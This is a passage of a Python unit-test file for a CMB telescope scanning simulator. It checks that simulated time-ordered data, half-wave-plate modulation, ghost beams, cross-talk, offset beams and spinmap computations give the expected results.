self.assertEqual(func.shape, (mmax + 1, 12 * nside ** 2)) self.assertEqual(func_c.shape, (2 * mmax + 1, 12 * nside ** 2)) def test_scan_spole(self): ''' Perform a (low resolution) scan and see if TOD make sense. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 polang = 20. ces_opts = dict(ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2.) scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 1 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=1, fov=4, lmax=self.lmax, fwhm=fwhm, polang=polang) beam = scs.beams[0][0] scs.init_detpair(self.alm, beam, nside_spin=nside, max_spin=mmax) scs.partition_mission() chunk = scs.chunks[0] ces_opts.update(chunk) # Populate boresight. scs.constant_el_scan(**ces_opts) # Test without returning anything (default behaviour). 
scs.scan(beam, **chunk) tod = scs.scan(beam, return_tod=True, **chunk) self.assertEqual(tod.size, chunk['end'] - chunk['start']) pix, nside_out, pa, hwp_ang = scs.scan(beam, return_point=True, **chunk) self.assertEqual(pix.size, tod.size) self.assertEqual(nside, nside_out) self.assertEqual(pa.size, tod.size) self.assertEqual(hwp_ang, 0) # Turn on HWP scs.set_hwp_mod(mode='continuous', freq=1., start_ang=0) scs.rotate_hwp(**chunk) tod2, pix2, nside_out2, pa2, hwp_ang2 = scs.scan(beam, return_tod=True, return_point=True, **chunk) np.testing.assert_almost_equal(pix, pix2) np.testing.assert_almost_equal(pix, pix2) np.testing.assert_almost_equal(pa, pa2) self.assertTrue(np.any(np.not_equal(tod, tod2)), True) self.assertEqual(nside_out, nside_out2) self.assertEqual(hwp_ang2.size, tod.size) # Construct TOD manually. polang = beam.polang maps_sm = np.asarray(hp.alm2map(self.alm, nside, verbose=False, fwhm=np.radians(beam.fwhm / 60.))) np.testing.assert_almost_equal(maps_sm[0], scs.spinmaps['main_beam']['s0a0']['maps'][0]) q = np.real(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) u = np.imag(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) np.testing.assert_almost_equal(maps_sm[1], q) np.testing.assert_almost_equal(maps_sm[2], u) tod_man = maps_sm[0][pix] tod_man += (maps_sm[1][pix] \ * np.cos(2 * np.radians(pa - polang - 2 * hwp_ang2))) tod_man += (maps_sm[2][pix] \ * np.sin(2 * np.radians(pa - polang - 2 * hwp_ang2))) np.testing.assert_almost_equal(tod2, tod_man) def test_scan_spole_pol(self): ''' Perform a (low resolution) pol only scan and see if TOD make sense. ''' alm = (self.alm[0] * 0, self.alm[1], self.alm[2]) mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 polang = 20. ces_opts = dict(ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2.) scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 1 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=1, fov=4, lmax=self.lmax, fwhm=fwhm, polang=polang) beam = scs.beams[0][0] scs.init_detpair(alm, beam, nside_spin=nside, max_spin=mmax) scs.partition_mission() chunk = scs.chunks[0] ces_opts.update(chunk) # Populate boresight. scs.constant_el_scan(**ces_opts) # Test without returning anything (default behaviour). scs.scan(beam, **chunk) tod = scs.scan(beam, return_tod=True, **chunk) self.assertEqual(tod.size, chunk['end'] - chunk['start']) pix, nside_out, pa, hwp_ang = scs.scan(beam, return_point=True, **chunk) self.assertEqual(pix.size, tod.size) self.assertEqual(nside, nside_out) self.assertEqual(pa.size, tod.size) self.assertEqual(hwp_ang, 0) # Turn on HWP scs.set_hwp_mod(mode='continuous', freq=1., start_ang=0) scs.rotate_hwp(**chunk) tod2, pix2, nside_out2, pa2, hwp_ang2 = scs.scan(beam, return_tod=True, return_point=True, **chunk) np.testing.assert_almost_equal(pix, pix2) np.testing.assert_almost_equal(pix, pix2) np.testing.assert_almost_equal(pa, pa2) self.assertTrue(np.any(np.not_equal(tod, tod2)), True) self.assertEqual(nside_out, nside_out2) self.assertEqual(hwp_ang2.size, tod.size) # Construct TOD manually. 
polang = beam.polang maps_sm = np.asarray(hp.alm2map(alm, nside, verbose=False, fwhm=np.radians(beam.fwhm / 60.))) np.testing.assert_almost_equal(maps_sm[0], scs.spinmaps['main_beam']['s0a0']['maps'][0]) q = np.real(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) u = np.imag(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) np.testing.assert_almost_equal(maps_sm[1], q) np.testing.assert_almost_equal(maps_sm[2], u) tod_man = maps_sm[0][pix] tod_man += (maps_sm[1][pix] \ * np.cos(2 * np.radians(pa - polang - 2 * hwp_ang2))) tod_man += (maps_sm[2][pix] \ * np.sin(2 * np.radians(pa - polang - 2 * hwp_ang2))) np.testing.assert_almost_equal(tod2, tod_man) def test_scan_spole_bin(self): ''' Perform a (low resolution) scan, bin and compare to input. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 2 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=2, fov=4, lmax=self.lmax, fwhm=fwhm) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside) # set instrument rotation. scs.set_instr_rot(period=rot_period, angles=[68, 113, 248, 293]) # Set elevation stepping. scs.set_el_steps(rot_period, steps=[0, 2, 4]) # Set HWP rotation. scs.set_hwp_mod(mode='continuous', freq=3.) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., nside_spin=nside, max_spin=mmax) # Solve for the maps. maps, cond = scs.solve_for_map(fill=np.nan) alm = hp.smoothalm(self.alm, fwhm=np.radians(fwhm/60.), verbose=False) maps_raw = np.asarray(hp.alm2map(self.alm, nside, verbose=False)) cond[~np.isfinite(cond)] = 10 np.testing.assert_array_almost_equal(maps_raw[0,cond<2.5], maps[0,cond<2.5], decimal=10) np.testing.assert_array_almost_equal(maps_raw[1,cond<2.5], maps[1,cond<2.5], decimal=10) np.testing.assert_array_almost_equal(maps_raw[2,cond<2.5], maps[2,cond<2.5], decimal=10) def test_scan_ghosts(self): ''' Perform a (low resolution) scan with two detectors, compare to detector + ghost. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create two Gaussian (main) beams. beam_opts = dict(az=0, el=0, polang=0, fwhm=fwhm, lmax=self.lmax, symmetric=True) ghost_opts = dict(az=-4, el=10, polang=34, fwhm=fwhm, lmax=self.lmax, symmetric=True, amplitude=0.1) scs.add_to_focal_plane(Beam(**beam_opts)) scs.add_to_focal_plane(Beam(**ghost_opts)) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside) # Set HWP rotation. scs.set_hwp_mod(mode='continuous', freq=3.) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., binning=False, nside_spin=nside, max_spin=mmax, save_tod=True) tod = scs.data(scs.chunks[0], beam=scs.beams[0][0], data_type='tod') tod += scs.data(scs.chunks[0], beam=scs.beams[1][0], data_type='tod') tod = tod.copy() # Repeat with single beam + ghost. 
scs.remove_from_focal_plane(scs.beams[1][0]) scs.beams[0][0].create_ghost(**ghost_opts) scs.reset_hwp_mod() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., binning=False, nside_spin=nside, max_spin=mmax, save_tod=True) tod_w_ghost = scs.data(scs.chunks[0], beam=scs.beams[0][0], data_type='tod') # Sum TOD of two beams must match TOD of single beam + ghost. np.testing.assert_array_almost_equal(tod, tod_w_ghost, decimal=10) def test_scan_ghosts_map(self): ''' Perform a (low resolution) scan with two detectors, compare map to detector + ghost. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create two Gaussian (main) beams. beam_opts = dict(az=0, el=0, polang=28, fwhm=fwhm, lmax=self.lmax, symmetric=True) ghost_opts = dict(az=0, el=0, polang=28, fwhm=fwhm, lmax=self.lmax, symmetric=True, amplitude=1) scs.add_to_focal_plane(Beam(**beam_opts)) scs.add_to_focal_plane(Beam(**ghost_opts)) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside) # Set HWP rotation. scs.set_hwp_mod(mode='continuous', freq=3.) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., binning=False, nside_spin=nside, max_spin=mmax, save_tod=True) tod = scs.data(scs.chunks[0], beam=scs.beams[0][0], data_type='tod') tod += scs.data(scs.chunks[0], beam=scs.beams[1][0], data_type='tod') tod = tod.copy() # Solve for the maps. maps, cond = scs.solve_for_map(fill=np.nan) # To supress warnings cond[~np.isfinite(cond)] = 10 # Repeat with single beam + ghost. scs.remove_from_focal_plane(scs.beams[1][0]) scs.beams[0][0].create_ghost(**ghost_opts) scs.reset_hwp_mod() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., binning=False, nside_spin=nside, max_spin=mmax, save_tod=True) tod_w_ghost = scs.data(scs.chunks[0], beam=scs.beams[0][0], data_type='tod') # Sum TOD of two beams must match TOD of single beam + ghost. np.testing.assert_array_almost_equal(tod, tod_w_ghost, decimal=10) # Maps must match. maps_w_ghost, cond_w_ghost = scs.solve_for_map(fill=np.nan) # To supress warnings cond_w_ghost[~np.isfinite(cond_w_ghost)] = 10 np.testing.assert_array_almost_equal(maps[0,cond<2.5], maps_w_ghost[0,cond_w_ghost<2.5], decimal=10) np.testing.assert_array_almost_equal(maps[1,cond<2.5], maps_w_ghost[1,cond_w_ghost<2.5], decimal=10) np.testing.assert_array_almost_equal(maps[2,cond<2.5], maps_w_ghost[2,cond_w_ghost<2.5], decimal=10) def test_cross_talk(self): '''Test if the cross-talk is performing as it should.''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Single pair. scs.create_focal_plane(nrow=1, ncol=1, fov=0, lmax=self.lmax, fwhm=fwhm) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside) # set instrument rotation. scs.set_instr_rot(period=rot_period, angles=[12, 14, 248, 293]) # Set elevation stepping. scs.set_el_steps(rot_period, steps=[0, 2, 4, 8, 10]) # Set HWP rotation. scs.set_hwp_mod(mode='stepped', freq=3.) beam_a, beam_b = scs.beams[0] scs.init_detpair(self.alm, beam_a, beam_b=beam_b, nside_spin=nside) # Generate timestreams, bin them and store as attributes. 
scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., max_spin=mmax, reuse_spinmaps=True, save_tod=True, binning=False, ctalk=0.0) tod_a = scs.data(scs.chunks[0], beam=beam_a, data_type='tod').copy() tod_b = scs.data(scs.chunks[0], beam=beam_b, data_type='tod').copy() # Redo with cross-talk ctalk = 0.5 scs.reset_instr_rot() scs.reset_hwp_mod() scs.reset_el_steps() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., max_spin=mmax, reuse_spinmaps=True, save_tod=True, binning=False, ctalk=ctalk) tod_ac = scs.data(scs.chunks[0], beam=beam_a, data_type='tod') tod_bc = scs.data(scs.chunks[0], beam=beam_b, data_type='tod') np.testing.assert_array_almost_equal(tod_ac, tod_a + ctalk * tod_b) np.testing.assert_array_almost_equal(tod_bc, tod_b + ctalk * tod_a) # Redo with less cross-talk ctalk = 0.000001 scs.reset_instr_rot() scs.reset_hwp_mod() scs.reset_el_steps() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., max_spin=mmax, reuse_spinmaps=True, save_tod=True, binning=False, ctalk=ctalk) tod_acs = scs.data(scs.chunks[0], beam=beam_a, data_type='tod') tod_bcs = scs.data(scs.chunks[0], beam=beam_b, data_type='tod') np.testing.assert_array_almost_equal(tod_acs, tod_a + ctalk * tod_b) np.testing.assert_array_almost_equal(tod_bcs, tod_b + ctalk * tod_a) np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, tod_ac, tod_acs) np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, tod_bc, tod_bcs) def test_interpolate(self): ''' Compare interpolated TOD to default for extremely bandlimited input such that should agree relatively well. ''' mlen = 60 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 10 * 60 nside = 256 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 1 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=1, fov=4, lmax=self.lmax, fwhm=fwhm) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., nside_spin=nside, max_spin=mmax, binning=False) tod_raw = scs.tod.copy() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., nside_spin=nside, max_spin=mmax, reuse_spinmaps=False, interp=True, binning=False) np.testing.assert_array_almost_equal(tod_raw, scs.tod, decimal=0) def test_chunks(self): '''Test the _chunk2idx function. ''' mlen = 100 # so 1000 samples chunksize = 30 rot_period = 1.2 # Note, seconds. scs = ScanStrategy(duration=mlen, sample_rate=10) scs.partition_mission(chunksize=chunksize) self.assertEqual(len(scs.chunks), int(np.ceil(scs.nsamp / float(chunksize)))) # Take single chunk and subdivide it and check whether we # can correctly access a chunk-sized array. scs.set_instr_rot(period=rot_period) for chunk in scs.chunks: scs.rotate_instr() subchunks = scs.subpart_chunk(chunk) chunklen = chunk['end'] - chunk['start'] # Start with zero array, let every subchunk add ones # to its slice, then test if resulting array is one # everywhere. 
arr = np.zeros(chunklen, dtype=int) for subchunk in subchunks: self.assertEqual(subchunk['cidx'], chunk['cidx']) self.assertTrue(subchunk['start'] >= chunk['start']) self.assertTrue(subchunk['end'] <= chunk['end']) qidx_start, qidx_end = scs._chunk2idx(**subchunk) arr[qidx_start:qidx_end] += 1 np.testing.assert_array_equal(arr, np.ones_like(arr)) def test_preview_pointing_input(self): # Test if scan_instrument_mpi works with preview_pointing # option set. scs = ScanStrategy(duration=1, sample_rate=10, location='spole') # Should raise error if alm is None with preview_pointing not set. alm = None with self.assertRaises(TypeError): scs.scan_instrument_mpi(alm, verbose=0, preview_pointing=False) # Should not raise error if alm is provided and preview_pointing set. alm = self.alm scs.scan_instrument_mpi(alm, verbose=0, preview_pointing=True) def test_preview_pointing(self): # With preview_pointing set, expect correct proj matrix, # but vec vector should be zero. mlen = 6 * 60 rot_period = 30 step_period = rot_period * 2 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 10 nside_out = 32 az_throw = 10 scan_speed = 2 # deg / s. scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 2 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=2, fov=2, lmax=self.lmax, fwhm=fwhm) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside_out) # set instrument rotation. scs.set_instr_rot(period=rot_period, angles=[68, 113, 248, 293]) # Set elevation stepping. scs.set_el_steps(step_period, steps=[0, 1, 2]) # Set HWP rotation. scs.set_hwp_mod(mode='continuous', freq=3.) # First run with preview_pointing set alm = None preview_pointing = True # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=scan_speed, nside_spin=nside_out, max_spin=mmax, preview_pointing=preview_pointing) # Vec should be zero np.testing.assert_array_equal(scs.vec, np.zeros((3, 12 * nside_out ** 2))) # Save for comparison vec_prev = scs.vec proj_prev = scs.proj # Now run again in default way. # Create new dest arrays. scs.allocate_maps(nside=nside_out) scs.reset_instr_rot() scs.reset_hwp_mod() scs.reset_el_steps() alm = self.alm preview_pointing = False # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=scan_speed, nside_spin=nside_out, max_spin=mmax, preview_pointing=preview_pointing) # Vec should not be zero now. np.testing.assert_equal(np.any(scs.vec), True) # Proj should be identical. np.testing.assert_array_almost_equal(scs.proj, proj_prev, decimal=9) # Run one more time with a ghost. Ghost should not change proj. # Create new dest arrays. scs.allocate_maps(nside=nside_out) alm = self.alm preview_pointing = False scs.reset_instr_rot() scs.reset_hwp_mod() scs.reset_el_steps() ghost_opts = dict(az=10, el=10, polang=28, fwhm=fwhm, lmax=self.lmax, symmetric=True, amplitude=1) scs.beams[0][0].create_ghost(**ghost_opts) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=scan_speed, nside_spin=nside_out, max_spin=mmax, preview_pointing=preview_pointing) # Vec should not be zero now. np.testing.assert_equal(np.any(scs.vec), True) # Proj should be identical. 
np.testing.assert_array_almost_equal(scs.proj, proj_prev, decimal=9) def test_offset_beam(self): mlen = 20 # mission length sample_rate = 10 location='spole' lmax = self.lmax fwhm = 300 nside_spin = 256 polang = 30 az_off = 20 el_off = 40 ss = ScanStrategy(mlen, sample_rate=sample_rate, location=location) # Create single detector. ss.create_focal_plane(nrow=1, ncol=1, fov=0, no_pairs=True, polang=polang, lmax=lmax, fwhm=fwhm) # Move detector away from boresight. ss.beams[0][0].az = az_off ss.beams[0][0].el = el_off # Start instrument rotated. rot_period = ss.mlen ss.set_instr_rot(period=rot_period, start_ang=45) ss.set_hwp_mod(mode='stepped', freq=1/20., start_ang=45, angles=[34, 12, 67]) ss.partition_mission() ss.scan_instrument_mpi(self.alm, binning=False, nside_spin=nside_spin, max_spin=2, interp=True) # Store the tod and pixel indices made with symmetric beam. tod_sym = ss.tod.copy() # Now repeat with asymmetric beam and no detector offset. # Set offsets to zero such that tods are generated using # only the boresight pointing. ss.beams[0][0].az = 0 ss.beams[0][0].el = 0 ss.beams[0][0].polang = 0 # Convert beam spin modes to E and B modes and rotate them # create blm again, scan_instrument_mpi detetes blms when done ss.beams[0][0].gen_gaussian_blm() blm = ss.beams[0][0].blm blmI = blm[0].copy() blmE, blmB = tools.spin2eb(blm[1], blm[2]) # Rotate blm to match centroid. # Note that rotate_alm uses the ZYZ euler convention. # Note that we include polang here as first rotation. q_off = ss.det_offset(az_off, el_off, polang) ra, dec, pa = ss.quat2radecpa(q_off) # We need to to apply these changes to the angles. phi = np.radians(ra) theta = np.radians(90 - dec) psi = np.radians(-pa) # rotate blm hp.rotate_alm([blmI, blmE, blmB], psi, theta, phi, lmax=lmax, mmax=lmax) # convert beam coeff. back to spin representation. blmm2, blmp2 = tools.eb2spin(blmE, blmB) ss.beams[0][0].blm = (blmI, blmm2, blmp2) ss.reset_instr_rot() ss.reset_hwp_mod() ss.scan_instrument_mpi(self.alm, binning=False, nside_spin=nside_spin, max_spin=lmax, interp=True) # TODs must agree at least at 2% per sample. np.testing.assert_equal(np.abs(ss.tod - tod_sym) < 0.02 * np.std(tod_sym), np.full(tod_sym.size, True)) def test_offset_beam_pol(self): mlen = 20 # mission length sample_rate = 10 location='spole' lmax = self.lmax fwhm = 300 nside_spin = 256 #polang = 30 #az_off = 20 #el_off = 40 polang = 90 az_off = 20 el_off = 0 alm = (self.alm[0]*0., self.alm[1], self.alm[2]) ss = ScanStrategy(mlen, sample_rate=sample_rate, location=location) # Create single detector. ss.create_focal_plane(nrow=1, ncol=1, fov=0, no_pairs=True, polang=polang, lmax=lmax, fwhm=fwhm) # Move detector away from boresight. ss.beams[0][0].az = az_off ss.beams[0][0].el = el_off # Start instrument rotated. rot_period = ss.mlen ss.set_instr_rot(period=rot_period, start_ang=45) #ss.set_hwp_mod(mode='stepped', freq=1/20., start_ang=45, # angles=[34, 12, 67]) ss.partition_mission() ss.scan_instrument_mpi(alm, binning=False, nside_spin=nside_spin, max_spin=2, interp=True) # Store the tod and pixel indices made with symmetric beam. tod_sym = ss.tod.copy() # Now repeat with asymmetric beam and no detector offset. # Set offsets to zero such that tods are generated using # only the boresight pointing. 
        ss.beams[0][0].az = 0
        ss.beams[0][0].el = 0
        ss.beams[0][0].polang = 0

        # Convert beam spin modes to E and B modes and rotate them.
        # Create blm again; scan_instrument_mpi deletes blms when done.
        ss.beams[0][0].gen_gaussian_blm()
        blm = ss.beams[0][0].blm
        blmI = blm[0].copy()
        blmE, blmB = tools.spin2eb(blm[1], blm[2])

        # Rotate blm to match the detector centroid.
        # Note that rotate_alm uses the ZYZ Euler convention.
        # Note that we include polang here as the first rotation.
        q_off = ss.det_offset(az_off, el_off, polang)
        ra, dec, pa = ss.quat2radecpa(q_off)

        # We need to apply these pointing offsets to the Euler angles.
        phi = np.radians(ra)
        theta = np.radians(90 - dec)
        psi = np.radians(-pa)

        # Rotate blm.
        hp.rotate_alm([blmI, blmE, blmB], psi, theta, phi, lmax=lmax,
                      mmax=lmax)

        # Convert the beam coefficients back to the spin representation.
        blmm2, blmp2 = tools.eb2spin(blmE, blmB)
        ss.beams[0][0].blm = (blmI, blmm2, blmp2)

        ss.reset_instr_rot()
        ss.reset_hwp_mod()

        ss.scan_instrument_mpi(alm, binning=False, nside_spin=nside_spin,
                               max_spin=lmax, interp=True)

        # TODs must agree to within 2% of the symmetric-beam scatter
        # for every sample.
        np.testing.assert_equal(
            np.abs(ss.tod - tod_sym) < 0.02 * np.std(tod_sym),
            np.full(tod_sym.size, True))

    def test_offset_beam_I(self):

        mlen = 20  # Mission length.
        sample_rate = 10
        location = 'spole'
        lmax = self.lmax
        fwhm = 300
        nside_spin = 256
        polang = 30
        az_off = 20
        el_off = 40

        # Zero out the polarization alm; only temperature is scanned here.
        alm = (self.alm[0], self.alm[1] * 0., self.alm[2] * 0.)

        ss = ScanStrategy(mlen, sample_rate=sample_rate, location=location)

        # Create a single detector.
        ss.create_focal_plane(nrow=1, ncol=1, fov=0, no_pairs=True,
                              polang=polang, lmax=lmax, fwhm=fwhm)

        # Move the detector away from the boresight.
        ss.beams[0][0].az = az_off
        ss.beams[0][0].el = el_off

        # Start with the instrument rotated.
        rot_period = ss.mlen
        ss.set_instr_rot(period=rot_period, start_ang=45)

        ss.set_hwp_mod(mode='stepped', freq=1/20., start_ang=45,
                       angles=[34, 12, 67])

        ss.partition_mission()
        ss.scan_instrument_mpi(alm, binning=False, nside_spin=nside_spin,
                               max_spin=2, interp=True)

        # Store the tod and pixel indices made with the symmetric beam.
        tod_sym = ss.tod.copy()

        # Now repeat with an asymmetric beam and no detector offset.
        # Set offsets to zero such that tods are generated using
        # only the boresight pointing.
        ss.beams[0][0].az = 0
        ss.beams[0][0].el = 0
        ss.beams[0][0].polang = 0

        # Convert beam spin modes to E and B modes and rotate them.
        # Create blm again; scan_instrument_mpi deletes blms when done.
        ss.beams[0][0].gen_gaussian_blm()
        blm = ss.beams[0][0].blm
        blmI = blm[0].copy()
        blmE, blmB = tools.spin2eb(blm[1], blm[2])

        # Rotate blm to match the detector centroid.
        # Note that rotate_alm uses the ZYZ Euler convention.
        # Note that we include polang here as the first rotation.
        q_off = ss.det_offset(az_off, el_off, polang)
        ra, dec, pa = ss.quat2radecpa(q_off)

        # We need to apply these pointing offsets to the Euler angles.
        phi = np.radians(ra)
        theta = np.radians(90 - dec)
        psi = np.radians(-pa)

        # Rotate blm.
        hp.rotate_alm([blmI, blmE, blmB], psi, theta, phi, lmax=lmax,
                      mmax=lmax)

        # Convert the beam coefficients back to the spin representation.
        blmm2, blmp2 = tools.eb2spin(blmE, blmB)
        ss.beams[0][0].blm = (blmI, blmm2, blmp2)

        ss.reset_instr_rot()
        ss.reset_hwp_mod()

        ss.scan_instrument_mpi(alm, binning=False, nside_spin=nside_spin,
                               max_spin=lmax, interp=True)

        # TODs must agree to within 2% of the symmetric-beam scatter
        # for every sample.
        np.testing.assert_equal(
            np.abs(ss.tod - tod_sym) < 0.02 * np.std(tod_sym),
            np.full(tod_sym.size, True))

    def test_spinmaps_complex(self):
        # Test that _spinmaps_complex reduces to the real-valued case
        # (conjugate-symmetric spinmaps) when sky and beam B-modes are zero.

        def rand_alm(lmax):
            alm = np.empty(hp.Alm.getsize(lmax), dtype=np.complex128)
            alm[:] = np.random.randn(hp.Alm.getsize(lmax))
            alm += 1j * np.random.randn(hp.Alm.getsize(lmax))
            # Make m=0 modes real.
            alm[:lmax+1] = np.real(alm[:lmax+1])
            return alm

        lmax = 10
        almE, almB = tuple([rand_alm(lmax) for i in range(2)])
        blmE, blmB = tuple([rand_alm(lmax) for i in range(2)])
        spin_values = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5]
        nside = 32

        spinmaps = ScanStrategy._spinmaps_complex(almE, almB*0, blmE, blmB*0,
                                                  spin_values, nside)

        for spin in range(6):
            sidx_pos = spin + 5
            sidx_neg = 5 - spin
            np.testing.assert_almost_equal(spinmaps[sidx_pos],
                                           np.conj(spinmaps[sidx_neg]))

    def test_init_spinmaps_old_new(self):
        # Test that spinmaps are consistent between the old and new
        # implementations of the HWP.

        def rand_alm(lmax):
            alm = np.empty(hp.Alm.getsize(lmax), dtype=np.complex128)
            alm[:] = np.random.randn(hp.Alm.getsize(lmax))
            alm += 1j * np.random.randn(hp.Alm.getsize(lmax))
            # Make m=0 modes real.
            alm[:lmax+1] = np.real(alm[:lmax+1])
            return alm

        lmax = 4
        alm = tuple([rand_alm(lmax) for i in range(3)])

        blmI = np.array([0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                        dtype=np.complex128)
        blmm2 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0],
                         dtype=np.complex128)
        blmp2 = np.zeros_like(blmm2)
        blm = (blmI, blmm2, blmp2)

        nside = 32
        max_spin = 3

        spinmaps_old = ScanStrategy._init_spinmaps(alm, blm, max_spin, nside,
                                                   symmetric=False,
                                                   hwp_mueller=None)

        hwp_mueller = np.asarray([[1, 0, 0, 0],
                                  [0, 1, 0, 0],
                                  [0, 0, -1, 0],
                                  [0, 0, 0, -1]])

        spinmaps_new = ScanStrategy._init_spinmaps(alm, blm, max_spin, nside,
                                                   symmetric=False,
                                                   hwp_mueller=hwp_mueller)

        np.testing.assert_almost_equal(spinmaps_old['s0a0']['maps'],
                                       spinmaps_new['s0a0']['maps'])

        # All s2a4 spinmaps except the one at index 5 should vanish for
        # both implementations; index 5 should agree between the two.
        zero_map = np.zeros(hp.nside2npix(nside))
        for sidx in (0, 1, 2, 3, 4, 6):
            np.testing.assert_almost_equal(
                spinmaps_old['s2a4']['maps'][sidx], zero_map)
            np.testing.assert_almost_equal(
                spinmaps_new['s2a4']['maps'][sidx], zero_map)

        np.testing.assert_almost_equal(spinmaps_old['s2a4']['maps'][5],
                                       spinmaps_new['s2a4']['maps'][5])

    def test_scan_spole_hwp_mueller(self):
        '''
        Perform a (low resolution) scan with a HWP Mueller matrix
        specified and see if the TOD makes sense.
        '''

        mlen = 10 * 60
        rot_period = 120
        mmax = 2
        ra0 = -10
        dec0 = -57.5
        fwhm = 200
        nside = 128
        az_throw = 10
        polang = 20.

        ces_opts = dict(ra0=ra0, dec0=dec0, az_throw=az_throw,
                        scan_speed=2.)

        scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole')

        # Create a 1 x 1 square grid of Gaussian beams.
        scs.create_focal_plane(nrow=1, ncol=1, fov=4, lmax=self.lmax,
                               fwhm=fwhm, polang=polang)
        beam = scs.beams[0][0]

        hwp_mueller = np.asarray([[1, 0, 0, 0],
                                  [0, 1, 0, 0],
                                  [0, 0, -1, 0],
                                  [0, 0, 0, -1]])
        beam.hwp_mueller = hwp_mueller

        scs.init_detpair(self.alm, beam, nside_spin=nside, max_spin=mmax)
        scs.partition_mission()

        chunk = scs.chunks[0]
        ces_opts.update(chunk)

        # Populate boresight.
        scs.constant_el_scan(**ces_opts)

        # Turn on the HWP.
        scs.set_hwp_mod(mode='continuous', freq=1., start_ang=0)
        scs.rotate_hwp(**chunk)

        tod, pix, nside_out, pa, hwp_ang = scs.scan(beam, return_tod=True,
                                                    return_point=True,
                                                    **chunk)

        # Construct the TOD manually.
        polang = beam.polang
        maps_sm = np.asarray(hp.alm2map(self.alm, nside, verbose=False,
                                        fwhm=np.radians(beam.fwhm / 60.)))

        np.testing.assert_almost_equal(
            maps_sm[0], scs.spinmaps['main_beam']['s0a0']['maps'][0])

        q = np.real(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2])
        u = np.imag(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2])
        np.testing.assert_almost_equal(maps_sm[1], q)
        np.testing.assert_almost_equal(maps_sm[2], u)

        tod_man = maps_sm[0][pix]
        tod_man += (maps_sm[1][pix]
                    * np.cos(2 * np.radians(pa - polang - 2 * hwp_ang)))
        tod_man += (maps_sm[2][pix]
                    * np.sin(2 * np.radians(pa - polang - 2 * hwp_ang)))

        np.testing.assert_almost_equal(tod, tod_man)

    def test_scan_spole_bin_hwp_mueller(self):
        '''
